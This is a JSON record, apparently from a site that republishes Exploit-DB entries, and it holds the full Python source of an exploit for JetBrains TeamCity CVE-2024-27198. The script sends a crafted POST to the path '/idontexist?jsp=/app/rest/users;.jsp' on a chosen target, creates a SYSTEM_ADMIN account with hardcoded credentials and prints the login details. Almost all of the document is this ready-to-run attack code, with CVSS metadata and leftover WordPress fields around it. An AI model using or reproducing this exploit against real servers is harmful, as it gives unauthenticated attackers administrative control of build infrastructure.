{“lastseen”:”2025-08-11T18:06:44″,”description”:”!\/usr\/bin\/env python3 –…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”JetBrains TeamCity 2023.11.4 – Authentication Bypass”,”source”:””,”references”:””,”id”:”EDB-ID:52411″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-27198″],”sourceData”:”#!\/usr\/bin\/env python3\\r\\n# -*- coding: utf-8 -*-\\r\\n\\”\\”\\”\\r\\n# Exploit Title: JetBrains TeamCity 2023.11.4 – Authentication Bypass\\r\\n# Date: 2024-02-21\\r\\n# Exploit Author: ibrahimsql (https:\/\/github.com\/ibrahimsql)\\r\\n# Vendor Homepage: https:\/\/www.jetbrains.com\/teamcity\/\\r\\n# Version: \\u003c 2023.11.4\\r\\n# CVE: CVE-2024-27198\\r\\n# CVSS Score: 9.8 (Critical)\\r\\n# Description:\\r\\n# JetBrains TeamCity before version 2023.11.4 contains a critical authentication bypass\\r\\n# vulnerability that allows unauthenticated attackers to perform administrative actions.\\r\\n# The vulnerability leverages a path traversal-like technique in the JSP handling\\r\\n# mechanism combined with REST API endpoints to bypass authentication.\\r\\n# Requirements: requests\\u003e=2.25.1\\r\\n\\”\\”\\”\\r\\n\\r\\nimport requests\\r\\nimport argparse\\r\\nimport sys\\r\\nimport json\\r\\nfrom urllib.parse import urlparse\\r\\n\\r\\nrequests.packages.urllib3.disable_warnings()\\r\\n\\r\\nclass Colors:\\r\\n RED = ‘\\\\033[91m’\\r\\n GREEN = ‘\\\\033[92m’\\r\\n YELLOW = ‘\\\\033[93m’\\r\\n BLUE = ‘\\\\033[94m’\\r\\n CYAN = ‘\\\\033[96m’\\r\\n BOLD = ‘\\\\033[1m’\\r\\n END = ‘\\\\033[0m’\\r\\n\\r\\nbanner = f\\”\\”\\”{Colors.CYAN}\\r\\n \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\\r\\n \u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\\r\\n \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2554\u255d \\r\\n \u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u255a\u2588\u2588\u2554\u255d \\r\\n \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \\r\\n \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d \\r\\n{Colors.END}\\r\\n{Colors.BOLD}{Colors.RED} TeamCity Authentication Bypass (CVE-2024-27198){Colors.END}\\r\\n{Colors.YELLOW} Author: ibrahimsql{Colors.END}\\r\\n\\”\\”\\”\\r\\n\\r\\nparser = argparse.ArgumentParser(description=\\”TeamCity Authentication Bypass Exploit (CVE-2024-27198)\\”)\\r\\nparser.add_argument(\\”–url\\”, type=str, required=True, help=\\”Target TeamCity URL\\”)\\r\\nparser.add_argument(\\”–timeout\\”, type=int, default=15, help=\\”Request timeout (default: 15)\\”)\\r\\nparser.add_argument(\\”–verbose\\”, \\”-v\\”, action=\\”store_true\\”, help=\\”Enable verbose output\\”)\\r\\nargs = parser.parse_args()\\r\\n\\r\\nclass TeamCityExploit:\\r\\n def __init__(self, target_url, timeout=15, verbose=False):\\r\\n self.target_url = target_url.rstrip(‘\/’)\\r\\n self.timeout = timeout\\r\\n self.verbose = verbose\\r\\n self.session = requests.Session()\\r\\n \\r\\n def _log(self, message, level=\\”info\\”):\\r\\n if level == \\”success\\”:\\r\\n print(f\\”{Colors.GREEN}[+] {message}{Colors.END}\\”)\\r\\n elif level == \\”error\\”:\\r\\n print(f\\”{Colors.RED}[-] {message}{Colors.END}\\”)\\r\\n elif level == \\”warning\\”:\\r\\n print(f\\”{Colors.YELLOW}[!] {message}{Colors.END}\\”)\\r\\n elif level == \\”info\\”:\\r\\n print(f\\”{Colors.BLUE}[*] {message}{Colors.END}\\”)\\r\\n elif level == \\”verbose\\” and self.verbose:\\r\\n print(f\\”[DEBUG] {message}\\”)\\r\\n \\r\\n def check_target_reachability(self):\\r\\n try:\\r\\n self._log(f\\”Checking target: {self.target_url}\\”)\\r\\n response = self.session.get(self.target_url, verify=False, timeout=self.timeout)\\r\\n \\r\\n if response.status_code in [200, 302, 401, 403]:\\r\\n self._log(\\”Target is reachable\\”, \\”success\\”)\\r\\n return True\\r\\n else:\\r\\n self._log(f\\”Unexpected status: {response.status_code}\\”, \\”error\\”)\\r\\n return False\\r\\n \\r\\n except requests.exceptions.Timeout:\\r\\n self._log(\\”Connection timeout\\”, \\”error\\”)\\r\\n return False\\r\\n except requests.exceptions.ConnectionError:\\r\\n self._log(\\”Connection error\\”, \\”error\\”)\\r\\n return False\\r\\n except Exception as e:\\r\\n self._log(f\\”Error: {str(e)}\\”, \\”error\\”)\\r\\n return False\\r\\n \\r\\n def exploit_authentication_bypass(self):\\r\\n exploit_path = \\”\/idontexist?jsp=\/app\/rest\/users;.jsp\\”\\r\\n full_url = f\\”{self.target_url}{exploit_path}\\”\\r\\n \\r\\n self._log(f\\”Targeting: {full_url}\\”)\\r\\n \\r\\n headers = {\\r\\n \\”Content-Type\\”: \\”application\/json\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\”,\\r\\n \\”Accept\\”: \\”application\/json, text\/plain, *\/*\\”\\r\\n }\\r\\n \\r\\n payload = {\\r\\n \\”username\\”: \\”ibrahimsql\\”,\\r\\n \\”password\\”: \\”ibrahimsql\\”,\\r\\n \\”email\\”: \\”ibrahimsql@exploit.local\\”,\\r\\n \\”roles\\”: {\\r\\n \\”role\\”: [{\\r\\n \\”roleId\\”: \\”SYSTEM_ADMIN\\”,\\r\\n \\”scope\\”: \\”g\\”\\r\\n }]\\r\\n }\\r\\n }\\r\\n \\r\\n self._log(f\\”Payload: {json.dumps(payload)}\\”, \\”verbose\\”)\\r\\n \\r\\n try:\\r\\n self._log(\\”Attempting authentication bypass…\\”)\\r\\n \\r\\n response = self.session.post(full_url, headers=headers, verify=False, json=payload, timeout=self.timeout)\\r\\n \\r\\n self._log(f\\”Status: {response.status_code}\\”, \\”verbose\\”)\\r\\n self._log(f\\”Response: {response.text[:200]}\\”, \\”verbose\\”)\\r\\n \\r\\n if response.status_code == 200:\\r\\n self._log(\\”Exploit successful!\\”, \\”success\\”)\\r\\n \\r\\n print(f\\”\\\\n{Colors.BOLD}{Colors.GREEN}[SUCCESS] Admin user created!{Colors.END}\\”)\\r\\n print(f\\”{Colors.CYAN}{‘=’*50}{Colors.END}\\”)\\r\\n print(f\\”{Colors.YELLOW}Username:{Colors.END} ibrahimsql\\”)\\r\\n print(f\\”{Colors.YELLOW}Password:{Colors.END} ibrahimsql\\”)\\r\\n print(f\\”{Colors.YELLOW}Login URL:{Colors.END} {self.target_url}\/login.html\\”)\\r\\n print(f\\”{Colors.CYAN}{‘=’*50}{Colors.END}\\”)\\r\\n \\r\\n return True\\r\\n \\r\\n elif response.status_code == 401:\\r\\n self._log(\\”Authentication required – target may be patched\\”, \\”error\\”)\\r\\n return False\\r\\n elif response.status_code == 404:\\r\\n self._log(\\”Endpoint not found – target may be patched\\”, \\”error\\”)\\r\\n return False\\r\\n elif response.status_code == 403:\\r\\n self._log(\\”Access forbidden\\”, \\”error\\”)\\r\\n return False\\r\\n else:\\r\\n self._log(f\\”Unexpected status: {response.status_code}\\”, \\”error\\”)\\r\\n return False\\r\\n \\r\\n except requests.exceptions.Timeout:\\r\\n self._log(\\”Request timeout\\”, \\”error\\”)\\r\\n return False\\r\\n except requests.exceptions.ConnectionError:\\r\\n self._log(\\”Connection error\\”, \\”error\\”)\\r\\n return False\\r\\n except Exception as e:\\r\\n self._log(f\\”Error: {str(e)}\\”, \\”error\\”)\\r\\n return False\\r\\n\\r\\ndef validate_url(url):\\r\\n try:\\r\\n parsed = urlparse(url)\\r\\n if not parsed.scheme:\\r\\n url = f\\”http:\/\/{url}\\”\\r\\n parsed = urlparse(url)\\r\\n \\r\\n if parsed.scheme not in [‘http’, ‘https’]:\\r\\n raise ValueError(\\”URL must use HTTP or HTTPS\\”)\\r\\n \\r\\n if not parsed.netloc:\\r\\n raise ValueError(\\”Invalid URL format\\”)\\r\\n \\r\\n return url\\r\\n except Exception as e:\\r\\n raise ValueError(f\\”Invalid URL: {str(e)}\\”)\\r\\n\\r\\ndef main():\\r\\n print(banner)\\r\\n \\r\\n try:\\r\\n target_url = validate_url(args.url)\\r\\n \\r\\n print(f\\”{Colors.BOLD}{Colors.CYAN}=== CVE-2024-27198 TeamCity Exploit ==={Colors.END}\\”)\\r\\n print(f\\”{Colors.YELLOW}Author:{Colors.END} ibrahimsql\\”)\\r\\n print(f\\”{Colors.YELLOW}Target:{Colors.END} {target_url}\\”)\\r\\n print(f\\”{Colors.CYAN}{‘=’*45}{Colors.END}\\\\n\\”)\\r\\n \\r\\n exploit = TeamCityExploit(target_url=target_url, timeout=args.timeout, verbose=args.verbose)\\r\\n \\r\\n if not exploit.check_target_reachability():\\r\\n exploit._log(\\”Cannot reach target\\”, \\”error\\”)\\r\\n sys.exit(1)\\r\\n \\r\\n success = exploit.exploit_authentication_bypass()\\r\\n \\r\\n if success:\\r\\n exploit._log(\\”Exploit completed!\\”, \\”success\\”)\\r\\n sys.exit(0)\\r\\n else:\\r\\n exploit._log(\\”Exploit failed\\”, \\”error\\”)\\r\\n sys.exit(1)\\r\\n \\r\\n except ValueError as e:\\r\\n print(f\\”{Colors.RED}[-] {str(e)}{Colors.END}\\”)\\r\\n sys.exit(1)\\r\\n except KeyboardInterrupt:\\r\\n print(f\\”\\\\n{Colors.YELLOW}[!] Interrupted{Colors.END}\\”)\\r\\n sys.exit(1)\\r\\n except Exception as e:\\r\\n print(f\\”{Colors.RED}[-] Error: {str(e)}{Colors.END}\\”)\\r\\n sys.exit(1)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52411″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52411″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-11T18:06:44″,”description”:”!\/usr\/bin\/env python3 –…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”JetBrains TeamCity 2023.11.4 – Authentication Bypass”,”source”:””,”references”:””,”id”:”EDB-ID:52411″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-27198″],”sourceData”:”#!\/usr\/bin\/env python3\\r\\n# -*- coding: utf-8 -*-\\r\\n\\”\\”\\”\\r\\n# Exploit Title: JetBrains TeamCity 2023.11.4 – Authentication Bypass\\r\\n# Date: 2024-02-21\\r\\n# Exploit Author:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-10386","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n